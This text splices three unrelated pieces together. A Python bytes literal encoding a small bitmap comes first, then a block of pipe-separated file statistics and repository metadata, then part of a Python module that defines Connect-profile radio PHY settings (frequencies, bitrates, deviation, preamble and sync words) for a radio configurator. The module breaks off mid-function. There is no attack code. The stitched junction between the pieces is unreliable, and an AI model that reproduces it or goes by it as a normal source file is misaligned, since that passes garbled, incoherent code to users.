b'\x00\x00\x00\x00\x00\xbb\xbb\x22\x22\xbb\x22\x22\xbb\xbb\xbb\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xbb\xbb\x22\x22\xbb\x22\x22\xbb\xbb\xbb\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x55'\
b'\x55\x55\x55\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x55'\
b'\x55\x55\x55\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x55\x44\x44'\
b'\x44\x44\x44\x55\x55\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x55\x44\x44'\
b'\x44\x44\x44\x55\x55\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x55\x44\x44\x44\x44'\
b'\x44\x44\x44\x22\x44\x55\x55\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x55\x44\x44\x44\x44'\
b'\x44\x44\x44\x22\x44\x55\x55\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x55\x55\x44\x44\x44\x44\x44\x22'\
b'\x44\x44\x44\x44\x44\x44\x44\x55\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x55\x55\x44\x44\x44\x44\x44\x22'\
b'\x44\x44\x44\x44\x44\x44\x44\x55\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x55\x55\x44\x44\x44\x44\x22\x44\x44\x44'\
b'\x44\x44\x44\x44\x22\x44\x44\x44\x55\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x55\x55\x44\x44\x44\x44\x22\x44\x44\x44'\
b'\x44\x44\x44\x44\x22\x44\x44\x44\x55\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x55\x55\x44\x44\x44\x44\x44\x22\x44\x44\x44\x44'\
b'\x44\x44\x22\x44\x44\x44\x44\x44\x44\x55\x55\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x55\x55\x44\x44\x44\x44\x44\x22\x44\x44\x44\x44'\
b'\x44\x44\x22\x44\x44\x44\x44\x44\x44\x55\x55\x00\x00\x00\x00\x00'\
b'\x00\x00\x55\x55\x44\x44\x44\x44\x44\x44\x22\x22\x44\x44\x44\x22'\
b'\x44\x33\x44\x22\x33\x44\x44\x44\x44\x44\x44\x55\x00\x00\x00\x00'\
b'\x00\x00\x55\x55\x44\x44\x44\x44\x44\x44\x22\x22\x44\x44\x44\x22'\
b'\x44\x33\x44\x22\x33\x44\x44\x44\x44\x44\x44\x55\x00\x00\x00\x00'\
b'\x00\x55\x44\x44\x44\x44\x44\x44\x44\x44\x33\x44\x33\x44\x33\x22'\
b'\x44\x44\x44\x44\x22\x44\x44\x44\x44\x44\x44\x44\x55\x00\x00\x00'\
b'\x00\x55\x44\x44\x44\x44\x44\x44\x44\x44\x33\x44\x33\x44\x33\x22'\
b'\x44\x44\x44\x44\x22\x44\x44\x44\x44\x44\x44\x44\x55\x00\x00\x00'\
b'\x22\x55\x44\x22\x44\x44\x22\x44\x44\x44\x44\x44\x44\x22\x44\x33'\
b'\x44\x22\x44\x44\x44\x22\x44\x44\x44\x44\x44\x44\x44\x55\x00\x00'\
b'\x22\x55\x44\x22\x44\x44\x22\x44\x44\x44\x44\x44\x44\x22\x44\x33'\
b'\x44\x22\x44\x44\x44\x22\x44\x44\x44\x44\x44\x44\x44\x55\x00\x00'\
b'\x22\x22\x55\x44\x44\x44\x44\x44\x44\x22\x44\x44\x44\x44\x44\x22'\
b'\x44\x22\x44\x44\x44\x22\x44\x44\x44\x44\x44\x44\x44\x44\x55\x00'\
b'\x22\x22\x55\x44\x44\x44\x44\x44\x44\x22\x44\x44\x44\x44\x44\x22'\
b'\x44\x22\x44\x44\x44\x22\x44\x44\x44\x44\x44\x44\x44\x44\x55\x00'\
b'\x22\x22\x22\x55\x55\x44\x44\x44\x22\x44\x22\x44\x44\x44\x44\x22'\
b'\x22\x44\x44\x44\x44\x22\x22\x44\x44\x44\x44\x44\x44\x44\x55\x55'\
b'\x22\x22\x22\x55\x55\x44\x44\x44\x22\x44\x22\x44\x44\x44\x44\x22'\
b'\x22\x44\x44\x44\x44\x22\x22\x44\x44\x44\x44\x44\x44\x44\x55\x55'\
b'\x22\x22\x22\x22\x22\x55\x22\x44\x44\x44\x44\x44\x44\x44\x33\x44'\
b'\x22\x22\x44\x33\x44\x44\x44\x44\x44\x22\x44\x44\x55\x55\x22\x22'\
b'\x22\x22\x22\x22\x22\x55\x22\x44\x44\x44\x44\x44\x44\x44\x33\x44'\
b'\x22\x22\x44\x33\x44\x44\x44\x44\x44\x22\x44\x44\x55\x55\x22\x22'\
b'\x00\x22\x22\x22\x22\x22\x22\x55\x55\x44\x44\x44\x44\x44\x44\x44'\
b'\x44\x22\x44\x44\x44\x44\x44\x44\x44\x44\x44\x55\x22\x22\x22\x22'\
b'\x00\x22\x22\x22\x22\x22\x22\x55\x55\x44\x44\x44\x44\x44\x44\x44'\
b'\x44\x22\x44\x44\x44\x44\x44\x44\x44\x44\x44\x55\x22\x22\x22\x22'\
b'\x00\x00\x22\x22\x22\x22\x22\x22\x22\x55\x55\x44\x44\x44\x44\x44'\
b'\x44\x44\x44\x44\x44\x44\x44\x44\x55\x55\x55\x22\x22\x22\x22\x22'\
b'\x00\x00\x22\x22\x22\x22\x22\x22\x22\x55\x55\x44\x44\x44\x44\x44'\
b'\x44\x44\x44\x44\x44\x44\x44\x44\x55\x55\x55\x22\x22\x22\x22\x22'\
b'\x00\x00\x00\x22\x22\x22\x22\x22\x22\x22\x22\x55\x55\x44\x22\x44'\
b'\x44\x44\x44\x44\x44\x22\x55\x55\x22\x22\x22\x22\x22\x22\x22\x22'\
b'\x00\x00\x00\x22\x22\x22\x22\x22\x22\x22\x22\x55\x55\x44\x22\x44'\
b'\x44\x44\x44\x44\x44\x22\x55\x55\x22\x22\x22\x22\x22\x22\x22\x22'\
b'\x00\x00\x00\x00\x00\x22\x22\x22\x22\x22\x22\x22\x22\x55\x44\x44'\
b'\x44\x44\x44\x55\x55\x55\x22\x22\x22\x22\x22\x22\x22\x22\x00\x00'\
b'\x00\x00\x00\x00\x00\x22\x22\x22\x22\x22\x22\x22\x22\x55\x44\x44'\
b'\x44\x44\x44\x55\x55\x55\x22\x22\x22\x22\x22\x22\x22\x22\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x22\x22\x22\x22\x22\x22\x22\x55\x55'\
b'\x55\x55\x55\x22\x22\x22\x22\x22\x22\x22\x22\x22\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x22\x22\x22\x22\x22\x22\x22\x55\x55'\
b'\x55\x55\x55\x22\x22\x22\x22\x22\x22\x22\x22\x22\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x22\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x22\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\x22\x22\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\x22\x22\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x22\x22'\
b'\x22\x22\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x22\x22'\
b'\x22\x22\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
BITMAP = memoryview(_bitmap)
| 68.293846
| 123
| 0.710437
| 10,913
| 44,391
| 2.889673
| 0.003757
| 0.686475
| 0.844776
| 0.915554
| 0.994451
| 0.994451
| 0.994451
| 0.994451
| 0.994451
| 0.994451
| 0
| 0.397644
| 0.015003
| 44,391
| 649
| 124
| 68.399076
| 0.323568
| 0
| 0
| 0.984592
| 0
| 0.986133
| 0.92271
| 0.92271
| 0
| 1
| 0.002163
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 16
|
7a41d220565ff9eba980c83bbccb7c07e27c3498
| 29,906
|
py
|
Python
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/jumbo/phys/Phys_connect.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 82
|
2016-06-29T17:24:43.000Z
|
2021-04-16T06:49:17.000Z
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/jumbo/phys/Phys_connect.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 6
|
2022-01-12T18:22:08.000Z
|
2022-03-25T10:19:27.000Z
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/jumbo/phys/Phys_connect.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 56
|
2016-08-02T10:50:50.000Z
|
2021-07-19T08:57:34.000Z
|
from pyradioconfig.calculator_model_framework.Utils.LogMgr import LogMgr
from pyradioconfig.calculator_model_framework.interfaces.iphy import IPhy
from py_2_and_3_compatibility import *
class PHYS_connect(IPhy):
def Connect_base(self, phy, model):
phy.profile_inputs.baudrate_tol_ppm.value = 0
phy.profile_inputs.dsss_chipping_code.value = long(0)
phy.profile_inputs.dsss_len.value = 0
phy.profile_inputs.dsss_spreading_factor.value = 0
phy.profile_inputs.fsk_symbol_map.value = model.vars.fsk_symbol_map.var_enum.MAP0
phy.profile_inputs.modulation_type.value = model.vars.modulation_type.var_enum.FSK2
phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.Gaussian
phy.profile_inputs.shaping_filter_param.value = 0.5
phy.profile_inputs.symbol_encoding.value = model.vars.symbol_encoding.var_enum.NRZ
phy.profile_inputs.xtal_frequency_hz.value = 38400000
phy.profile_inputs.diff_encoding_mode.value = model.vars.diff_encoding_mode.var_enum.DISABLED
phy.profile_inputs.crc_byte_endian.value = model.vars.crc_byte_endian.var_enum.MSB_FIRST
phy.profile_inputs.crc_bit_endian.value = model.vars.crc_bit_endian.var_enum.MSB_FIRST
phy.profile_inputs.preamble_pattern_len.value = 2
phy.profile_inputs.preamble_length.value = 32
phy.profile_inputs.preamble_pattern.value = 1
phy.profile_inputs.syncword_0.value = long(11732)
phy.profile_inputs.syncword_1.value = long(0)
phy.profile_inputs.syncword_length.value = 16
phy.profile_inputs.white_poly.value = model.vars.white_poly.var_enum.PN9
def PHY_Connect_915MHz_2GFSK_500kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='US FCC 915, Brazil 915', readable_name="Connect 915MHz 2GFSK 500kbps", phy_name=phy_name)
self.Connect_base(phy, model)
phy.profile_inputs.rx_xtal_error_ppm.value = 0
phy.profile_inputs.tx_xtal_error_ppm.value = 0
phy.profile_inputs.deviation.value = 175000
phy.profile_inputs.base_frequency_hz.value = 915000000
phy.profile_inputs.bitrate.value = 500000
phy.profile_inputs.preamble_length.value = 40
phy.profile_inputs.syncword_tx_skip.value = False
phy.profile_inputs.asynchronous_rx_enable.value = False
phy.profile_inputs.frequency_comp_mode.value = model.vars.frequency_comp_mode.var_enum.INTERNAL_LOCK_AT_PREAMBLE_DETECT
phy.profile_inputs.channel_spacing_hz.value = 400000
phy.profile_inputs.test_ber.value = False
phy.profile_inputs.fec_en.value = model.vars.fec_en.var_enum.NONE
phy.profile_inputs.manchester_mapping.value = model.vars.manchester_mapping.var_enum.Default
return phy
def PHY_Connect_902MHz_2GFSK_200kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='US FCC 902, Brazil 902', readable_name="Connect 902MHz 2GFSK 200kbps", phy_name=phy_name)
self.Connect_base(phy, model)
phy.profile_inputs.agc_period.value = 0
phy.profile_inputs.base_frequency_hz.value = long(902000000)
phy.profile_inputs.bitrate.value = 200000
phy.profile_inputs.deviation.value = 50000
phy.profile_inputs.channel_spacing_hz.value = 400000
phy.profile_inputs.rx_xtal_error_ppm.value = 20
phy.profile_inputs.symbols_in_timing_window.value = 14
phy.profile_inputs.tx_xtal_error_ppm.value = 20
phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.Gaussian
phy.profile_inputs.frequency_comp_mode.value = model.vars.frequency_comp_mode.var_enum.INTERNAL_LOCK_AT_PREAMBLE_DETECT
return phy
def PHY_Connect_434MHz_2GFSK_200kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='US FCC 434', readable_name="Connect 434MHz 2GFSK 200kbps", phy_name=phy_name)
self.Connect_base(phy, model)
phy.profile_inputs.agc_period.value = 0
phy.profile_inputs.bandwidth_hz.value = 400000
phy.profile_inputs.base_frequency_hz.value = long(434000000)
phy.profile_inputs.bitrate.value = 200000
phy.profile_inputs.deviation.value = 100000
phy.profile_inputs.channel_spacing_hz.value = 500000
phy.profile_inputs.rx_xtal_error_ppm.value = 20
phy.profile_inputs.symbols_in_timing_window.value = 14
phy.profile_inputs.tx_xtal_error_ppm.value = 20
phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.Gaussian
phy.profile_inputs.frequency_comp_mode.value = model.vars.frequency_comp_mode.var_enum.INTERNAL_LOCK_AT_PREAMBLE_DETECT
return phy
def PHY_Connect_863MHz_2GFSK_100kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='Europe 868', readable_name="Connect 863MHz 2GFSK 100kbps", phy_name=phy_name)
self.Connect_base(phy, model)
phy.profile_inputs.agc_period.value = 0
phy.profile_inputs.bandwidth_hz.value = 200000
phy.profile_inputs.base_frequency_hz.value = long(863000000)
phy.profile_inputs.bitrate.value = 100000
phy.profile_inputs.deviation.value = 50000
phy.profile_inputs.channel_spacing_hz.value = 400000
phy.profile_inputs.rx_xtal_error_ppm.value = 20
phy.profile_inputs.symbols_in_timing_window.value = 14
phy.profile_inputs.tx_xtal_error_ppm.value = 20
phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.Gaussian
phy.profile_inputs.frequency_comp_mode.value = model.vars.frequency_comp_mode.var_enum.INTERNAL_LOCK_AT_PREAMBLE_DETECT
return phy
def PHY_Connect_169MHz_2GFSK_4p8kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='Europe 169', readable_name="Connect 169MHz 2GFSK 4.8kbps", phy_name=phy_name)
self.Connect_base(phy, model)
phy.profile_inputs.agc_period.value = 0
phy.profile_inputs.base_frequency_hz.value = long(169000000)
phy.profile_inputs.bitrate.value = 4800
phy.profile_inputs.deviation.value = 1200
phy.profile_inputs.channel_spacing_hz.value = 12500
phy.profile_inputs.number_of_timing_windows.value = 2
phy.profile_inputs.rx_xtal_error_ppm.value = 7
phy.profile_inputs.symbols_in_timing_window.value = 6
phy.profile_inputs.timing_detection_threshold.value = 10
phy.profile_inputs.tx_xtal_error_ppm.value = 7
phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.Gaussian
phy.profile_inputs.frequency_comp_mode.value = model.vars.frequency_comp_mode.var_enum.INTERNAL_LOCK_AT_PREAMBLE_DETECT
return phy
def PHY_Connect_490MHz_2GFSK_10kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='China 490', readable_name="Connect 490MHz 2GFSK 10kbps", phy_name=phy_name)
self.Connect_base(phy, model)
phy.profile_inputs.agc_period.value = 0
phy.profile_inputs.base_frequency_hz.value = long(490000000)
phy.profile_inputs.bitrate.value = 10000
phy.profile_inputs.deviation.value = 25000
phy.profile_inputs.channel_spacing_hz.value = 200000
phy.profile_inputs.rx_xtal_error_ppm.value = 20
phy.profile_inputs.symbols_in_timing_window.value = 14
phy.profile_inputs.tx_xtal_error_ppm.value = 20
phy.profile_inputs.frequency_comp_mode.value = model.vars.frequency_comp_mode.var_enum.INTERNAL_ALWAYS_ON
phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.Gaussian
return phy
def PHY_Connect_920MHz_2GFSK_100kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='Japan 915', readable_name="Connect 920MHz 2GFSK 100kbps", phy_name=phy_name)
self.Connect_base(phy, model)
phy.profile_inputs.agc_period.value = 0
phy.profile_inputs.bandwidth_hz.value = 198000
phy.profile_inputs.base_frequency_hz.value = long(920000000)
phy.profile_inputs.bitrate.value = 100000
phy.profile_inputs.deviation.value = 50000
phy.profile_inputs.channel_spacing_hz.value = 400000
phy.profile_inputs.rx_xtal_error_ppm.value = 0
phy.profile_inputs.symbols_in_timing_window.value = 14
phy.profile_inputs.tx_xtal_error_ppm.value = 0
phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.Gaussian
phy.profile_inputs.frequency_comp_mode.value = model.vars.frequency_comp_mode.var_enum.INTERNAL_LOCK_AT_PREAMBLE_DETECT
return phy
def PHY_Connect_424MHz_2GFSK_4p8kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='Korea 424', readable_name="Connect 424MHz 2GFSK 4.8kbps", phy_name=phy_name)
self.Connect_base(phy, model)
phy.profile_inputs.agc_period.value = 0
phy.profile_inputs.bandwidth_hz.value = 12000
phy.profile_inputs.base_frequency_hz.value = long(424700000)
phy.profile_inputs.bitrate.value = 4800
phy.profile_inputs.deviation.value = 2400
phy.profile_inputs.channel_spacing_hz.value = 12500
phy.profile_inputs.rx_xtal_error_ppm.value = 20
phy.profile_inputs.symbols_in_timing_window.value = 14
phy.profile_inputs.tx_xtal_error_ppm.value = 20
phy.profile_inputs.freq_offset_hz.value = 1450
phy.profile_inputs.frequency_comp_mode.value = model.vars.frequency_comp_mode.var_enum.INTERNAL_LOCK_AT_PREAMBLE_DETECT
phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.Gaussian
return phy
def PHY_Connect_447MHz_2GFSK_4p8kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='Korea 447', readable_name="Connect 447MHz 2GFSK 4.8kbps", phy_name=phy_name)
self.Connect_base(phy, model)
phy.profile_inputs.agc_period.value = 0
phy.profile_inputs.bandwidth_hz.value = 12000
phy.profile_inputs.base_frequency_hz.value = long(447000000)
phy.profile_inputs.bitrate.value = 4800
phy.profile_inputs.deviation.value = 2400
phy.profile_inputs.channel_spacing_hz.value = 12500
phy.profile_inputs.rx_xtal_error_ppm.value = 20
phy.profile_inputs.symbols_in_timing_window.value = 14
phy.profile_inputs.tx_xtal_error_ppm.value = 20
phy.profile_inputs.freq_offset_hz.value = 1450
phy.profile_inputs.frequency_comp_mode.value = model.vars.frequency_comp_mode.var_enum.INTERNAL_LOCK_AT_PREAMBLE_DETECT
phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.Gaussian
return phy
def PHY_Connect_917MHz_2GFSK_4p8kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='Korea 915', readable_name="Connect 917MHz 2GFSK 4.8kbps", phy_name=phy_name)
self.Connect_base(phy, model)
phy.profile_inputs.agc_period.value = 0
phy.profile_inputs.base_frequency_hz.value = long(917100000)
phy.profile_inputs.bitrate.value = 4800
phy.profile_inputs.deviation.value = 2400
phy.profile_inputs.channel_spacing_hz.value = 200000
phy.profile_inputs.number_of_timing_windows.value = 10
phy.profile_inputs.rx_xtal_error_ppm.value = 2
phy.profile_inputs.symbols_in_timing_window.value = 1
phy.profile_inputs.tx_xtal_error_ppm.value = 3
phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.NONE
phy.profile_inputs.frequency_comp_mode.value = model.vars.frequency_comp_mode.var_enum.INTERNAL_LOCK_AT_PREAMBLE_DETECT
return phy
def PHY_Connect_915MHz_OQPSK_500kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='DSSS 500', readable_name="Connect 915MHz OQPSK 500Kbps", phy_name=phy_name)
self.Connect_base(phy, model)
phy.profile_inputs.rx_xtal_error_ppm.value = 0
phy.profile_inputs.tx_xtal_error_ppm.value = 0
phy.profile_inputs.deviation.value = 250000
phy.profile_inputs.base_frequency_hz.value = 915000000
phy.profile_inputs.bitrate.value = 500000
phy.profile_inputs.dsss_chipping_code.value = 31433
phy.profile_inputs.dsss_len.value = 16
phy.profile_inputs.dsss_spreading_factor.value = 4
phy.profile_inputs.preamble_length.value = 40
phy.profile_inputs.syncword_tx_skip.value = False
phy.profile_inputs.asynchronous_rx_enable.value = False
phy.profile_inputs.modulation_type.value = model.vars.modulation_type.var_enum.OQPSK
phy.profile_inputs.frequency_comp_mode.value = model.vars.frequency_comp_mode.var_enum.INTERNAL_LOCK_AT_PREAMBLE_DETECT
phy.profile_inputs.channel_spacing_hz.value = 400000
phy.profile_inputs.test_ber.value = False
phy.profile_inputs.fec_en.value = model.vars.fec_en.var_enum.NONE
phy.profile_inputs.symbol_encoding.value = model.vars.symbol_encoding.var_enum.DSSS
phy.profile_inputs.manchester_mapping.value = model.vars.manchester_mapping.var_enum.Default
return phy
def PHY_Connect_915mhz_oqpsk_800kcps_100kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='DSSS 100', readable_name="Connect 915MHz OQPSK 800kcps 100kbps", phy_name=phy_name)
self.Connect_base(phy, model)
phy.profile_inputs.agc_hysteresis.value = 0
phy.profile_inputs.agc_power_target.value = -6
phy.profile_inputs.agc_settling_delay.value = 40
phy.profile_inputs.base_frequency_hz.value = long(902000000)
phy.profile_inputs.baudrate_tol_ppm.value = 4000
phy.profile_inputs.bitrate.value = 100000
phy.profile_inputs.channel_spacing_hz.value = 2000000
phy.profile_inputs.crc_bit_endian.value = model.vars.crc_bit_endian.var_enum.LSB_FIRST
phy.profile_inputs.crc_byte_endian.value = model.vars.crc_byte_endian.var_enum.LSB_FIRST
phy.profile_inputs.deviation.value = 200000
phy.profile_inputs.diff_encoding_mode.value = model.vars.diff_encoding_mode.var_enum.DISABLED
phy.profile_inputs.dsss_chipping_code.value = long(1951056795)
phy.profile_inputs.dsss_len.value = 32
phy.profile_inputs.dsss_spreading_factor.value = 8
phy.profile_inputs.fsk_symbol_map.value = model.vars.fsk_symbol_map.var_enum.MAP0
phy.profile_inputs.manchester_mapping.value = model.vars.manchester_mapping.var_enum.Default
phy.profile_inputs.modulation_type.value = model.vars.modulation_type.var_enum.OQPSK
if model.part_family.lower() in ['dumbo', 'jumbo', 'nerio', 'nixi']:
# Series 1
